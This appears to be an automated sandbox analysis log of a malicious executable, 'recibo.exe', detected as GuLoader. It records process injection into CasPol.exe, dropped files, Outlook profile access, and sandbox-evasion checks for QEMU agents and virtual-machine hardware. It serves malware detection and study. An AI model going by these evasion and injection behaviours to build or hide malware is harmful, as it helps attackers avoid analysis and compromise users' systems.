            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB16751_2_02CB1675
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB02011_2_02CB0201
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB4E181_2_02CB4E18
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0E2F1_2_02CB0E2F
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0A2E1_2_02CB0A2E
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB16201_2_02CB1620
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB023A1_2_02CB023A
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB16361_2_02CB1636
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB8A341_2_02CB8A34
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB8BC81_2_02CB8BC8
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB87CC1_2_02CB87CC
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB07C21_2_02CB07C2
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB03EF1_2_02CB03EF
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0BEE1_2_02CB0BEE
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB07951_2_02CB0795
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB03B21_2_02CB03B2
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0BB71_2_02CB0BB7
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB87481_2_02CB8748
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC475D1_2_02CC475D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB876B1_2_02CB876B
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC4F6B1_2_02CC4F6B
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB07611_2_02CB0761
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB03791_2_02CB0379
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB071B1_2_02CB071B
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB032F1_2_02CB032F
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0F201_2_02CB0F20
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0B341_2_02CB0B34
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC70CE1_2_02CC70CE
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB04D81_2_02CB04D8
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00D01_2_02CB00D0
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0CD61_2_02CB0CD6
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB808C1_2_02CB808C
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB88841_2_02CB8884
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0C9E1_2_02CB0C9E
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00961_2_02CB0096
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB04A51_2_02CB04A5
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB08BB1_2_02CB08BB
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB08441_2_02CB0844
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00591_2_02CB0059
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB04621_2_02CB0462
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00011_2_02CB0001
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB08051_2_02CB0805
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB00151_2_02CB0015
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB042F1_2_02CB042F
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CBBC2D1_2_02CBBC2D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0C231_2_02CB0C23
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB71CF1_2_02CB71CF
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0DC31_2_02CB0DC3
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB01D11_2_02CB01D1
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0DF11_2_02CB0DF1
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB01961_2_02CB0196
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB09B71_2_02CB09B7
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB094F1_2_02CB094F
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB054D1_2_02CB054D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB01541_2_02CB0154
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB816A1_2_02CB816A
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB057E1_2_02CB057E
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0D7D1_2_02CB0D7D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB010B1_2_02CB010B
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0D101_2_02CB0D10
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB05141_2_02CB0514
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB0D3C1_2_02CB0D3C
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CBC9331_2_02CBC933
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB29311_2_02CB2931
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB81301_2_02CB8130
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB89351_2_02CB8935
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D3DA1604_2_1D3DA160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D3D98904_2_1D3D9890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D3D95484_2_1D3D9548
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC42E9 LoadLibraryA,NtAllocateVirtualMemory,1_2_02CC42E9
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC67E9 NtMapViewOfSection,1_2_02CC67E9
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CC61B4 NtProtectVirtualMemory,1_2_02CC61B4
            Source: HPSUPD-Win32Exe.exe.1.drStatic PE information: No import functions for PE file found
            Source: recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevm3ddevapi64-release.dll> vs recibo.exe
            Source: C:\Users\user\Desktop\recibo.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: recibo.exeVirustotal: Detection: 55%
            Source: recibo.exeMetadefender: Detection: 25%
            Source: recibo.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\recibo.exeFile read: C:\Users\user\Desktop\recibo.exeJump to behavior
            Source: recibo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\recibo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\recibo.exe "C:\Users\user\Desktop\recibo.exe"
            Source: C:\Users\user\Desktop\recibo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe"
            Source: C:\Users\user\Desktop\recibo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\recibo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe" Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe" Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\recibo.exeFile created: C:\Users\user\AppData\Local\Temp\nsa31B0.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@3/3
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
            Source: C:\Users\user\Desktop\recibo.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_0040498A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\dadoJump to behavior
            Source: recibo.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: lgpllibs.pdb source: lgpllibs.dll.1.dr
            Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Beta\x64\bin\vm3ddevapi64-debug.pdb source: vm3ddevapi64-debug.dll.1.dr
            Source: Binary string: C:\dev\UCDE\hallasan_gothamjarvis_4\ThirdParty\POG\HP.SmartApp.UCDE.Win32.Lib\HP.SmartApp.UCDE.Win32.Exe\obj\x64\Release\HPSUPD-Win32Exe.pdb source: HPSUPD-Win32Exe.exe.1.dr

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_715430C0 push eax; ret 1_2_715430EE
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB6640 push edx; retf 1_2_02CB665B
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB98EE pushad ; iretd 1_2_02CB992C
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB606C push ecx; retf A750h1_2_02CB62CF
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB65CB push edx; retf 1_2_02CB665B
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB156B push ss; retf 1_2_02CB156D
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB2931 push ds; retf 0FEBh1_2_02CB2B36
            Source: vm3ddevapi64-debug.dll.1.drStatic PE information: section name: .didat
            Source: vm3ddevapi64-debug.dll.1.drStatic PE information: section name: .gehcont
            Source: vm3ddevapi64-debug.dll.1.drStatic PE information: section name: _RDATA
            Source: lgpllibs.dll.1.drStatic PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_71541BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71541BFF
            Source: HPSUPD-Win32Exe.exe.1.drStatic PE information: 0x8CC4634B [Wed Nov 2 06:25:15 2044 UTC]
            Source: C:\Users\user\Desktop\recibo.exeFile created: C:\Users\user\AppData\Local\Temp\lgpllibs.dllJump to dropped file
            Source: C:\Users\user\Desktop\recibo.exeFile created: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dllJump to dropped file
            Source: C:\Users\user\Desktop\recibo.exeFile created: C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exeJump to dropped file
            Source: C:\Users\user\Desktop\recibo.exeFile created: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\recibo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: recibo.exe, 00000001.00000002.23385987124.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2632Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\recibo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lgpllibs.dllJump to dropped file
            Source: C:\Users\user\Desktop\recibo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dllJump to dropped file
            Source: C:\Users\user\Desktop\recibo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exeJump to dropped file
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_02CB12C7 rdtsc 1_2_02CB12C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9599Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
            Source: C:\Users\user\Desktop\recibo.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\recibo.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeAPI call chain: ExitProcess graph end nodegraph_1-19925
            Source: C:\Users\user\Desktop\recibo.exeAPI call chain: ExitProcess graph end nodegraph_1-20079
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\recibo.exeFile opened: C:\Users\user\AppData\Local\Temp\Rekorddage.Res7Jump to behavior
